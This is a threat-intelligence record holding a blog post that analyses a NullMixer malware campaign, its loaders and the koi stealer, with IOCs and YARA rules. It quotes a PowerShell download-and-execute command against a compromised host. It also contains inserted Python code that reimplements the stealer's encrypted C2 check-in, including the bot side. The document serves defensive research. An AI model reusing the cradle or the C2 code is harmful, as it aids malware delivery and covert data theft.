{
	"id": "1239a9e5-a733-44b5-b00a-8808037607b1",
	"created_at": "2026-04-06T01:32:10.496232Z",
	"updated_at": "2026-04-10T03:35:16.525644Z",
	"deleted_at": null,
	"sha1_hash": "46d06cf61405b37eef9bb5be6a97f900450b51bc",
	"title": "Updates from the MaaS: new threats delivered through NullMixer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2794760,
	"plain_text": "Updates from the MaaS: new threats delivered through NullMixer\r\nBy L M\r\nPublished: 2023-03-28 · Archived: 2026-04-06 00:28:38 UTC\r\n15 min read\r\nMar 27, 2023\r\nExecutive Summary\r\nOur insights into a recent NullMixer malware operation revealed that Italy and France are the favorite European\r\ncountries from the opportunistic attackers’ perspective.\r\nIn thirty days, the operation we monitored was capable of establishing initial access to over 8 thousand\r\nendpoints and stealing sensitive data that is now reaching the underground black markets.\r\nMost of the victims run Windows 10 Professional and Enterprise operating systems, including several\r\nDatacenter versions of Windows Server. Some of them also run Windows Embedded, indicating the\r\npenetration of this malware operation even into IoT environments.\r\nThe NullMixer package includes new polymorphic loaders from third-party MaaS and PPI service\r\nproviders in the underground markets, and also pieces of controversial, potentially North Korea-linked\r\nPseudoManuscrypt code.\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nPage 1 of 16\r\nIntroduction\r\nDuring March 2023, we obtained information and data regarding an ongoing malware operation hitting more than\r\n8,000 targets within a few weeks, with a particular emphasis on North American, Italian, and French targets.\r\nThis activity was related to a worldwide malware operation known as NullMixer, a controversial and widespread malware\r\ndelivery operation based on SEO poisoning and social engineering techniques to lure tech-savvy users, including\r\nIT personnel.\r\nThe insight from this attack wave revealed the presence of a controversial piece of code in the delivered payloads,\r\nalongside additional loaders related to new MaaS and PPI operators.\r\nTechnical Analysis\r\nThere are two main areas we technically analyzed during this 
investigation: first, the presence of two\r\npreviously unknown loaders entering the MaaS and PPI businesses (CrashedTech Loader and Koi), along with the presence of a\r\ncontroversial, potentially North Korea-linked piece of malware; second, we analyzed data about current\r\nsuccessful infection rates on targeted hosts.\r\nThe Originating Malvertising Campaign\r\nAccording to CTI investigation of the adversary infrastructure, we were able to identify an ongoing campaign\r\nluring system administrators into installing the malicious code on their machines. In particular, the identified attack\r\nwave was designed to trick users into installing backdoored, cracked versions of well-known PC maintenance software\r\nsuch as “EaseUS Partition Master” and “Driver Easy Pro”, two popular tools within the IT community.\r\nFilename: Driver Easy Pro Crack.exe\r\nMD5: 324db70fad161852fb9a12b202b6c8ad\r\nThe investigation led to a series of YouTube videos promoting cracks for such programs. One of them presented a\r\nmasked, hooded male hacker explaining how to use the crack linked in the video description. The threat actor\r\nabused the Bitly shortener and an ad hoc BlogSpot account to protect the malicious code, ultimately stored in an encrypted\r\nzip archive hosted on Mega.nz.\r\nFigure. The final download link is presented on BlogSpot\r\nThis particular modus operandi matches a threat Kaspersky researchers spotted in September 2022\r\n(link): NullMixer. NullMixer is a worldwide criminal operation designed to provide infection services to a\r\nmultitude of criminal threat actors. 
In fact, its operators packed a multitude of malware into a single vector and then\r\nabused social engineering, SEO poisoning, and malvertising techniques to lure their victims into running their\r\npayloads.\r\nNullMixer has kept the same lure topic since September 2022, advertising fake pirated software cracks\r\ntargeting tech-savvy users and potentially even IT personnel and freelancers.\r\nDuring the March 2023 infection wave, the operators evolved their social engineering techniques by producing the\r\nabove-mentioned YouTube videos containing instructions to download and run the backdoored pirated software.\r\nFigure. NullMixer video operator\r\nDespite that evolution, NullMixer’s initial payload remains substantially the same: a WinRAR self-extracting (SFX) executable\r\ncontaining multiple binaries configured to be launched automatically, all at the same time, when the archive is opened.\r\nFigure. Contents of the NullMixer executable\r\nThis plethora of malicious code related to different threat actors gives us the chance to better understand the\r\nevolution of the cybercriminal underground. 
In fact, aside from the well-known off-the-shelf info stealers, we also\r\nobserved the presence of more peculiar pieces of code, including other unconventional malware loader services.\r\nCrack.exe, likely a “PseudoManuscrypt” loader, a threat known since June 2021 that\r\nKaspersky attributes to the Chinese threat landscape; at the moment, the speculation about Lazarus\r\n(APT38) authorship of this piece of code does not carry enough confidence (link, link).\r\nBrg.exe, a common Raccoon Stealer with its command and control server hosted by VDSina, a Russian\r\ncloud provider.\r\nLower.exe, a sample of the “GCleaner” spyware; historically, this piece of malware initially faked\r\nCCleaner to drop additional malware (link).\r\nSqlcmd.exe, an interesting information stealer and dropper leveraging custom ECC cryptography to secure\r\nits communication (details below).\r\nKiffAppE2.exe, CrashedTech Loader, a new loader service operating since November 2022; malware details\r\nin the following subsection.\r\nss29.exe, a dropper loading a Fabookie wallet stealer retrieved from a JPEG image; it also leverages\r\na Google Cloud endpoint to serve malicious PAC files that configure traffic interception through an external HTTP\r\nproxy (T1090.002).\r\nThe following subsections highlight some of the above-mentioned samples, especially the loaders, to aim\r\nfor a better understanding of the current MaaS landscape.\r\nThe CrashedTech Loader\r\nThe “KiffAppE2.exe” file is worth mentioning because it works as a secondary loader. 
This loader appeared in the\r\nsecurity community in November 2022 thanks to @fr3dhk, who gave it its current name “CrashedTech Loader”;\r\nits panel has already been added to the “What Is This C2” collection (link).\r\nFilename: KiffAppE2.exe\r\nHash: 53f9c2f2f1a755fc04130fd5e9fcaff4\r\nThe “KiffAppE2.exe” file is a .NET binary hiding the loader code in plain sight: it runs the loader\r\ncode before showing the application form. It also checks a particular registry key, “KiffAppApi”, under the HKCU\r\nhive to make sure the victim has not already been infected, as re-infections would likely hurt the actor’s PPI model.\r\nFigure. Loader entry point\r\nThe loader code is pretty straightforward; its main logic consists of two steps. First, it checks in by sending\r\nuser name, OS version, and public IP information to the “/addnew.php” endpoint on the C2, then it parses the\r\nserver response to extract the location from which to download further payloads. After this, it downloads the payload\r\nand executes it through the “Process.Start” .NET API.\r\nFigure. 
Loader check-in and launch body\r\nDuring March 2023, this particular loader was dropping at least two distinct RedLine Stealer payloads configured\r\nto connect back to C2 servers hosted by the Ukrainian hosting provider Timehost.\r\nThe “Koi” Stealer/Loader\r\nAnother interesting piece of malware embedded in the NullMixer campaign we reference as ATK-16 is the\r\n“sqlcmd.exe” binary, a 32-bit MSVC binary.\r\nFilename: sqlcmd.exe\r\nHash: 6ffbbca108cfe838ca7138e381df210d\r\nAt a high level, the main routine of this loader does two things: it repeatedly tries to download multiple executable\r\nfiles with the name patterns “ab[NUMBER].php” and “ab[NUMBER].exe” from a statically configured location,\r\nand it runs an additional inline PowerShell command to download and execute more code.\r\nFigure. Command string to retrieve executable PowerShell code\r\n“C:\\WINDOWS\\sysnative\\cmd.exe” /c “powershell -command IEX(New-Object\r\nNet.Webclient).DownloadString(‘https://neutropharma .com/wp/wp-content/debug2.ps1’)”\r\nThis particular sample of the loader downloads the PowerShell script from a compromised Pakistani WordPress\r\nsite. The typical names we observed being downloaded are “debug2.ps1”, “debug20.ps1”, “debug4.ps1” and so on.\r\nThe downloaded script contains a long chunk of bytes and a sort of decryption routine based on a textbook-looking\r\nXOR operation; after that, the resulting bytes are loaded as a .NET assembly module.\r\nFigure. Binary encoded data inside PowerShell and decryption routine.\r\nThe key to decrypting the embedded code is served through an external check-in service, implementing a multi-stage polymorphic protection scheme. 
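The loader stages described so far leave recognisable traces in web proxy logs. As an added example (written for this page, not code from the original post), the Python detector below runs over a few constructed proxy log lines and flags the CrashedTech Loader check-in (a public-IP lookup to api.ipify.org, as seen in the loader’s strings, followed within a minute by a POST to /addnew.php from the same client) and the sqlcmd.exe stages (ab<N>.php / ab<N>.exe downloads and debug<N>.ps1 fetches, matching the %s/ab%d.php, %s/ab%d.exe and debug[0-9]{1,3}.ps1 patterns in the YARA rules at the end of the post). The log format, the host names and the 60-second correlation window are assumptions made for the example.

```python
import re
from collections import defaultdict

# Patterns lifted from the strings in the post's YARA rules and IOC list:
#   sqlcmd.exe builds URLs as %s/ab%d.php and %s/ab%d.exe and fetches debug<N>.ps1
#   CrashedTech Loader resolves its public IP (api.ipify.org) and checks in to /addnew.php
AB_STAGE = re.compile('/ab[0-9]+[.](?:php|exe)$', re.I)
DEBUG_PS1 = re.compile('/debug[0-9]{1,3}[.]ps1$', re.I)
IPIFY_HOST = 'api.ipify.org'
CRASHEDTECH_PATH = '/addnew.php'
IPIFY_WINDOW = 60  # seconds allowed between the ipify lookup and the check-in (assumed)


def parse_line(line):
    # Constructed proxy log format (assumed): <epoch> <client_ip> <method> <host> <path>
    ts, client, method, host, path = line.split()
    return {'ts': int(ts), 'client': client, 'method': method, 'host': host, 'path': path}


def detect(lines):
    # Returns {client_ip: [(finding_kind, host+path), ...]} for lines that match the loader traffic.
    events = [parse_line(line) for line in lines if line.strip()]
    findings = defaultdict(list)
    last_ipify = {}  # client -> timestamp of its most recent public-IP lookup
    for e in events:
        c = e['client']
        if e['host'] == IPIFY_HOST:
            last_ipify[c] = e['ts']
        elif e['path'] == CRASHEDTECH_PATH and e['method'] == 'POST':
            # A bare POST to /addnew.php is weak on its own; require the ipify lookup first.
            seen = last_ipify.get(c)
            if seen is not None and 0 <= e['ts'] - seen <= IPIFY_WINDOW:
                findings[c].append(('crashedtech_checkin', e['host'] + e['path']))
        elif AB_STAGE.search(e['path']):
            findings[c].append(('sqlcmd_stage', e['host'] + e['path']))
        elif DEBUG_PS1.search(e['path']):
            findings[c].append(('sqlcmd_ps1', e['host'] + e['path']))
    return dict(findings)


# Constructed sample log: one CrashedTech victim, one sqlcmd.exe victim, one benign host.
SAMPLE_LOG = '''
1679900000 10.0.0.5 GET api.ipify.org /
1679900012 10.0.0.5 POST c2.example /addnew.php
1679900030 10.0.0.7 GET blog.example /wp/wp-content/debug2.ps1
1679900031 10.0.0.7 GET blog.example /wp/ab1.php
1679900032 10.0.0.7 GET blog.example /wp/ab2.exe
1679900040 10.0.0.9 POST shop.example /addnew.php
1679900050 10.0.0.9 GET cdn.example /static/abc.php
'''.strip().splitlines()


if __name__ == '__main__':
    for client, hits in detect(SAMPLE_LOG).items():
        for kind, url in hits:
            print(client, kind, url)
```

Run as a script it prints one finding per line; against real proxy or EDR telemetry the same two-step correlation applies, and the generic koi POST to /index.php is deliberately not matched on path alone because that would fire on half the web.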
Such initial C2 service also provides additional malware configuration,\r\nincluding the campaign ID and additional command and control locations.\r\nFigure. Dynamic configuration served by the C2\r\nDuring March 2023, the resulting binary was a .NET file packed with ConfuserEx 1.0.0. Once decoded, the\r\nmalicious payload is a .NET module named “koi” that implements information stealer functionalities such\r\nas password stealing from FileZilla, the Chrome browser, and Discord, crypto-wallet stealing, Telegram folder\r\nexfiltration and VPN configurations; it also looks for the presence of hardware wallets such as Trezor, probably to\r\nidentify high-value targets for cryptocurrency theft. The module also exfiltrates 2FA secrets from Twilio’s Authy\r\nlocal storage.\r\nFilename: “koi” (dumped)\r\nHash: 9725ec075e92e25ea5b6e99c35c7aa74\r\nBefore starting all these collection operations, the “koi” module invokes the “checkVal” function to avoid\r\nunwanted targets. In particular, it uses the mutex “99759703-b8b4-4cb2-8329-76f908b004f0” to avoid re-infection\r\nand also checks for the presence of the video controller of the Wine emulation framework, along with common user\r\nnames and computer names used by sandboxes or by AV emulation routines.\r\nFigure. Basic defense evasion checks\r\nThe module also avoids executing the malicious stealer routines if the system language is set to one of the\r\nvalues representing the CIS countries:\r\nAZ: Azerbaijan\r\nAM: Armenia\r\nBY: Belarus\r\nKZ: Kazakhstan\r\nKG: Kyrgyzstan\r\nMD: Moldova\r\nRU: Russia\r\nTJ: Tajikistan\r\nTM: Turkmenistan\r\nUZ: Uzbekistan\r\nFigure. 
CIS countries check\r\nAfter that, the “koi” module starts gathering information about the software installed on the system and sets up a\r\ncommunication channel with the command and control service received as a startup parameter, in this case the\r\nLatvian IP address 195.123.211,56.\r\nThis malware communicates with its command and control in a curious manner: it redirects certain memory\r\nstreams directly to the remote server; this way, the malware authors avoid touching the disk even to stage\r\ntemporary data before exfiltration. The first message sent to the C2 starts with the “CONFIG|” keyword and\r\ncontains check-in information along with the campaign ID passed to the module via its PowerShell loader. Then,\r\nthe C2 triages the infected host and responds in one of two ways: if “D” is returned, the “koi” module stops its\r\noperations; otherwise, the response contains additional commands and the malicious code starts gathering\r\neven more data from the infected host.\r\nIn detail, a valid response from the C2 server looks like this:\r\nLDR “|” (DO|AND|OR) “|” (On|Off) “|” ( list “,” list “,” .. ) “|” url “|” suffix\r\nHere the C2 server asks the bot to download and execute an additional payload from the remote location specified\r\nas “url”.\r\nAll these communications happen over plain HTTP, but despite that, messages are not easy to spot because the “koi”\r\nmodule encrypts them using a custom protocol based on ECC.\r\nFigure. Classes in the “koi” module\r\nIn fact, the C2 communication leverages a custom Curve25519 ECDH implementation to generate a shared\r\nsecret key that is then used to encrypt the otherwise plain HTTP body. 
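To make the exchange concrete, here is an added Python example, written for this page rather than taken from the koi module or the original post, that reconstructs both sides of the channel: the bot derives a shared secret from its fresh Curve25519 key and the server’s peer key, gzips the CONFIG| check-in, XORs it with the secret and sends 32 bytes of public key, the separator K and the ciphertext; the server side reverses the steps, and a third function flags bodies that carry this framing. The X25519 implementation is a self-contained RFC 7748 ladder so the script runs offline; the RFC 7748 test keys standing in for the hardcoded peer key, the cyclic reuse of the 32-byte secret as XOR keystream and the field layout after CONFIG| are assumptions, not values recovered from the sample.

```python
import gzip

# --- Minimal X25519 (RFC 7748 Montgomery ladder). Not constant time: analysis use only. ---
P = 2**255 - 19
A24 = 121665
BASEPOINT = (9).to_bytes(32, 'little')


def _clamp(scalar):
    k = bytearray(scalar)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, 'little')


def x25519(scalar, point):
    # Scalar multiplication on Curve25519; returns the 32-byte little-endian u coordinate.
    k = _clamp(scalar)
    x1 = int.from_bytes(bytearray(point[:31]) + bytearray([point[31] & 127]), 'little') % P
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb)) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, 'little')


def public_key(private):
    return x25519(private, BASEPOINT)


# --- koi-style framing: <32-byte bot public key> K <xor(gzip(plaintext), shared secret)> ---
SEPARATOR = b'K'


def _xor_stream(data, key):
    # Assumption: the 32-byte shared secret is reused cyclically as the XOR keystream.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def bot_build_body(bot_private, server_peer_key, plaintext):
    # Bot side: ECDH with the hardcoded peer key, compress-then-encrypt, prepend own public key.
    shared = x25519(bot_private, server_peer_key)
    return public_key(bot_private) + SEPARATOR + _xor_stream(gzip.compress(plaintext), shared)


def server_read_body(server_private, body):
    # Operator side (or a lab that controls the peer key): recover the plaintext check-in.
    bot_pub, sep, blob = body[:32], body[32:33], body[33:]
    if sep != SEPARATOR:
        raise ValueError('not a koi-framed body')
    shared = x25519(server_private, bot_pub)
    return gzip.decompress(_xor_stream(blob, shared))


def looks_like_koi_body(body):
    # Network-side check: opaque 32 bytes, the fixed separator at offset 32, then a payload.
    return len(body) > 33 and body[32:33] == SEPARATOR and body[:32] != bytes(32)


# RFC 7748 section 6.1 test keys, used here as the stand-in for the hardcoded server peer key.
SERVER_PRIVATE = bytes.fromhex('5dab087e624a8a4b79e17f8b83800ee66f3bb1292618b6fd1c2f8b27ff88e0eb')
SERVER_PEER_KEY = public_key(SERVER_PRIVATE)


def demo(bot_private=bytes(range(1, 33))):
    # Constructed check-in: the real field layout after CONFIG| is not documented in the post.
    checkin = b'CONFIG|campaign-01|DESKTOP-EXAMPLE|user|Windows 10 Pro'
    body = bot_build_body(bot_private, SERVER_PEER_KEY, checkin)
    return looks_like_koi_body(body), server_read_body(SERVER_PRIVATE, body)


if __name__ == '__main__':
    flagged, recovered = demo()
    print(flagged, recovered)
```

looks_like_koi_body is the cheap check a proxy or IDS can apply to POST bodies towards /index.php; recovering the plaintext as server_read_body does requires the operator’s private key, so outside a lab the detection value lies in the framing, not the content.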
In particular, the communication\r\nprotection scheme of this piece of malware works as follows:\r\nThe server “peer-key” is hardcoded into the packed .NET module’s Main function.\r\nThe bot’s “public-key” and “private-key” are randomly generated at process startup time.\r\nA shared secret is computed from the bot’s “private-key” and the server’s “peer-key”.\r\nThe shared secret is used to encrypt the GZipped memory stream using an XOR-based algorithm in a\r\ncompress-then-encrypt fashion.\r\nFigure. Shared Secret methods from Curve25519 implementation\r\nTo make all this work, the final message sent to the C2 server also needs to contain the bot’s “public-key”, and\r\nhere a detection opportunity emerges: the HTTP body of the generated request is created by concatenating the 32 bytes of\r\nthe randomly generated bot “public-key”, a static separator “K”, and then the encrypted stream.\r\nFigure. Message encryption routine\r\nAttack Wave Insights\r\nBased on the analysis of the C2 infrastructure involved in this NullMixer wave (ATK-16), we obtained insights\r\nabout successfully infected hosts. In particular, we were able to obtain evidence of the successful execution of at\r\nleast one of the payloads on the target machines.\r\nThe NullMixer operations we dissected (ATK-16) count victims in at least 87 countries. With an average\r\ninfection rate of 297 new victims per day, the malicious actors behind it hit over 8 thousand hosts in less than 30 days.\r\nPeaks of operations show an intensification of the activities starting from the 28th of February 2023, when the\r\ninfection rate jumped noticeably higher.\r\nFigure. 
Reconstruction of the infection operations activities.\r\nImpacted Countries\r\nDuring the March spike period, the malicious operators significantly expanded their campaign to countries\r\noutside North America: this wave hit many European countries, including Italy (4.57%, in fourth position) and\r\nFrance (3.38%, in sixth position).\r\nFigure. Target map of the ATK-16\r\nStarting from the infected hosts’ data available, the infection progression shows the clear horizontal expansion of\r\nthe attacked surface corresponding to the above-mentioned peak on the 28th of February.\r\nFigure. Infected host timeline per country\r\nTarget Profile\r\nAs we expected, the majority of the targeted hosts run Microsoft client operating systems: 56.8% Windows 10\r\nPro and 25.35% Windows 10 Home, indicating that the majority of the targets are micro or small businesses or private users.\r\nDespite that, we noticed interesting outliers: 5.3% of the victims run the Enterprise edition of the Microsoft\r\nOS, and around 71 hosts run the Windows Server edition of the Microsoft operating system.\r\nThe majority of the data extracted from the victims will likely reach the underground dark markets soon, but for\r\nthis latter portion of infected hosts the risk is even higher: the operator will likely try to sell access to these servers\r\nand enterprise machines to even more dangerous third parties, including well-known ransomware operators.\r\nFigure. 
Operating systems of infected machines\r\nIn the end, we also noticed that five machines that got infected were running an even rarer edition of the Microsoft\r\noperating system: Windows Embedded, an indication that even Windows-based IoT devices have been hit by this\r\ncampaign.\r\nConclusions\r\nAfter 9 months, the NullMixer operation evolved, leveraging malicious video tutorials to increase its penetration among\r\ntech-savvy users and revealing new potential players in the MaaS ecosystem.\r\nThe data we accessed during this investigation shed light on the impacted victims of their latest campaign, revealing\r\nItaly as the first European target hit by the March 2023 infection wave. During the recent period, Italy has been\r\nheavily targeted by cyber attacks, especially from young collectives of cyber-partisans supporting the Kremlin’s\r\npropaganda such as Killnet and NoName057. Such criminals base their operations on volunteer and micro-criminal labor forces, typically from the eastern CIS countries; for this reason, a spike in penetration\r\nagainst Italian hosts becomes particularly interesting, especially with the current geopolitical and cyber\r\ntemperature against the Italian peninsula.\r\nTechnical details of the victims, adversary infrastructure, and indicators of compromise have been shared with\r\nlocal authorities and the national CSIRT.\r\nIndicators of Compromise\r\n[ATK-16]\r\nMalvertising:\r\ns://www.youtube.com/watch?v=67UdCa9AbPA\r\nDropurl:\r\ns://bit.ly/3IqujMB\r\ns://crackfinddownload.blogspot.com/2023/02/your-download-link-httpswww.html\r\ns://mega.nz/file/SRgjGSpL#wDXn2ER24p_e43NwPOtQaa - EelC5MNO5iVhC3CGcuc (5123)\r\nEmbeddings:\r\nb2efceab3748f46e64091e87b1767abf brg.exe\r\ne299ac0fd27e67160225400bdd27366f Crack.exe\r\n53f9c2f2f1a755fc04130fd5e9fcaff4 KiffAppE2.exe\r\naaa7586b2e64363b85571195a01b14e9 
lower.exe\r\n6ffbbca108cfe838ca7138e381df210d sqlcmd.exe\r\nc4ffe80effddba0b8d9f82988464c5d0 ss29.exe\r\nC2 (CrashedTech Loader):\r\nttp://crashedff.xyz/addnew.php\r\n47.90.167,104\r\nC2 (RedLine):\r\nhrabrlonian,xyz:81\r\n45.130.151,133\r\nC2 (Fabookie Stealer):\r\ncount.iiagjaggg .com\r\n154.221.31,191\r\nttp://34.80.59,191/win.pac\r\nttp://34.80.59,191:8183/\r\nC2 (koi Stealer/Loader):\r\nttp://195.123.211,56/index.php\r\nC2 (PseudoManuscrypt):\r\ns://j.ffbbjjkk,com/25.html\r\ns://j.ffbbjjkk,com/logo.png\r\ns://h.ffbbhhtt,com/api6.php\r\nC2 (GCleaner):\r\nttp://45.12.253,56/advertisting/plus.php\r\n45.12.253,56\r\n45.12.253,72\r\n45.12.253,98\r\nC2 (Raccoon Stealer):\r\nttp://91.201.115,148\r\nMutex (koi):\r\nGlobal\\\\99759703-b8b4-4cb2-8329-76f908b004f0\r\nYara Rules\r\nrule crashedtech_loader {\r\n meta:\r\n author = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n hash_md5 = \"53f9c2f2f1a755fc04130fd5e9fcaff4\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\"\r\n tlp = \"WHITE\"\r\n strings:\r\n $trait_0 = {02 14 7d ?? ?? ?? ?? 02 28 ?? ?? ?? ?? ?? ?? 02 28 ?? ?? ?? ?? ?? 2a}\r\n $trait_1 = {?? 02 7b ?? ?? ?? ?? 6f ?? ?? ?? ?? ?? ?? 02 03 28 ?? ?? ?? ?? ?? 2a}\r\n $trait_2 = {?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7e ?? ?? ?? ?? 6f ?? ?? ?? ?? 0a 2b ??}\r\n $trait_4 = {?? 73 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0a 2b ??}\r\n $trait_5 = {06 6f ?? ?? ?? ?? ?? dc ?? de ?? 26 ?? ?? de ?? 2a}\r\n $trait_6 = {11 ?? 6f ?? ?? ?? ?? ?? dc 09 6f ?? ?? ?? ?? 16 fe 01 13 ?? 11 ?? 2c ??}\r\n $trait_7 = {06 6f ?? ?? ?? ?? ?? dc ?? de ?? 26 ?? ?? de ?? 2a}\r\n $trait_8 = {?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0a 28 ?? ?? ?? ?? 06 6f ?? ?? ?? ?? 
0b 2b ??}\r\n $str_0 = \"username\" wide\r\n $str_1 = \"windows\" wide\r\n $str_2 = \"client\" wide\r\n $str_3 = \"ip\" wide\r\n $str_4 = \"api.ipify.org\" wide\r\n $str_5 = \"(.*)<>(.*)\" wide\r\n condition:\r\n 5 of ($str_* ) and 3 of ($trait_*)\r\n}\r\nrule sqlcmd_loader {\r\n meta:\r\n author = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n hash_md5 = \"6ffbbca108cfe838ca7138e381df210d\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\"\r\n tlp = \"WHITE\"\r\n strings:\r\n $trait_0 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 ec 04 00 00}\r\n $trait_1 = {85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 9f 04 00 00}\r\n $trait_2 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 7d 04 00 00}\r\n $trait_3 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 5b 04 00 00}\r\n $trait_4 = {6a 20 59 2b d9 03 f1 03 d1 3b d9 0f 83 5f fb ff ff}\r\n $trait_5 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 e3 03 00 00}\r\n $trait_6 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 c1 03 00 00}\r\n $trait_7 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 9f 03 00 00}\r\n $trait_8 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 85 c9 0f 85 4c 03 00 00}\r\n $trait_9 = {33 c9 85 ff 0f 9f c1 8d 0c 4d ?? ?? ?? ?? 
85 c9 0f 85 2a 03 00 00}\r\n $str_0 = /debug[0-9]{1,3}\\.ps1/i wide\r\n $str_1 = \"%s\\\\\\\\sysnative\\\\\\\\%s\" wide\r\n $str_2 = \"/c \\\\\\\"powershell \" wide\r\n $str_3 = \"%s/ab%d.exe\" wide\r\n $str_4 = \"%s/ab%d.php\" wide\r\n condition:\r\n (5 of ($trait_*)) and (3 of ($str_*))\r\n}\r\nrule koi_loader {\r\n meta:\r\n author = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\"\r\n hash_md5 = \"9725ec075e92e25ea5b6e99c35c7aa74\"\r\n tlp = \"WHITE\"\r\n strings:\r\n $tm_0 = /debug[0-9]{1,3}\\.ps1/i wide\r\n $tm_1 = \"First stage size: {0}\" wide\r\n $tm_2 = \"Second stage size: {0}\" wide\r\n $tm_3 = \"Telegram Desktop\\\\tdata\" wide\r\n $tm_4 = \"Executed \" wide\r\n $tm_5 = \" or downloading \" wide\r\n $tm_6 = \"LDR\" wide\r\n $curve_0 = \"key must be 32 bytes long (but was {0} bytes long)\" wide\r\n $curve_1 = \"rawKey must be 32 bytes long (but was {0} bytes long)\" wide\r\n $curve_2 = \"rawKey\" wide\r\n $curve_3 = \"key\" wide\r\n condition:\r\n (5 of ($tm_*)) and (1 of ($curve_*))\r\n}\r\nrule fabookie_stealer {\r\n meta:\r\n author = \"@luc4m\"\r\n date = \"2023-03-26\"\r\n link = \"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\"\r\n hash_md5 = \"901ce391f5d25a12282e7ff436a5e62a\"\r\n tlp = \"WHITE\"\r\n strings:\r\n $trait_0 = {48 89 5c 24 ?? 48 89 74 24 ?? 57 48 83 ec 20 49 8b f8 8b da 48 8b f1 83 fa 01 75} // tail of this pattern is cut off in the published text\r\n $trait_1 = {48 89 48 ?? 48 8b 41 ?? 49 89 41 ?? 48 8b 07 48 3b 48 ?? 75 06}\r\n $trait_2 = {4c 89 48 ?? 49 89 09 4c 89 49 ?? 48 8b 42 ?? 40 38 70 ?? 0f 84 3b fe ff ff}\r\n $trait_3 = {49 8b 42 ?? c6 40 ?? ?? 48 8b 5c 24 ?? 49 8b c0 48 8b 74 24 ?? 48 8b 7c 24 ?? c3}\r\n $trait_4 = {83 67 ?? ?? 48 8b 5c 24 ?? 48 c7 47 ?? ?? ?? ?? ?? c6 07 00 48 83 c4 20 5f c3}\r\n $trait_5 = {83 67 ?? ?? 48 8b 5c 24 ?? 
48 c7 47 ?? ?? ?? ?? ?? c6 07 00 48 83 c4 20 5f c3}\r\n $trait_6 = {4c 8b 41 ?? 48 83 c2 27 49 2b c8 48 8d 41 ?? 48 83 f8 1f 77 44}\r\n $trait_7 = {18 e8 be e0 00 00 48 8b 4b ?? e8 a5 5d 04 00 48 8d 05 ?? ?? ?? ?? 48 89 03 40 f6} // tail of this pattern is cut off in the published text\r\n $trait_8 = {ba 30 00 00 00 48 8b cb e8 98 e0 00 00 48 8b c3 48 8b 5c 24 ?? 48 83 c4 20 5f c3}\r\n $trait_9 = {4d 30 e8 65 4f f8 ff 90 ?? ?? ?? ?? 39 70 ?? 72 03}\r\n condition:\r\n 5 of them\r\n}\r\nMany thanks to @3rb3ru5d3d53c for binlex!\r\nSource: https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1"
	],
	"report_names": [
		"updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1"
	],
	"threat_actors": [
		{
			"id": "4f472ea8-b147-486d-8533-88f8036343a6",
			"created_at": "2024-01-23T13:22:35.081084Z",
			"updated_at": "2026-04-10T02:00:03.520098Z",
			"deleted_at": null,
			"main_name": "Cyber Partisans",
			"aliases": [],
			"source_name": "MISPGALAXY:Cyber Partisans",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b4a6d558-3cba-499c-b58a-f15d65b7a604",
			"created_at": "2023-01-06T13:46:39.346924Z",
			"updated_at": "2026-04-10T02:00:03.295317Z",
			"deleted_at": null,
			"main_name": "Killnet",
			"aliases": [],
			"source_name": "MISPGALAXY:Killnet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
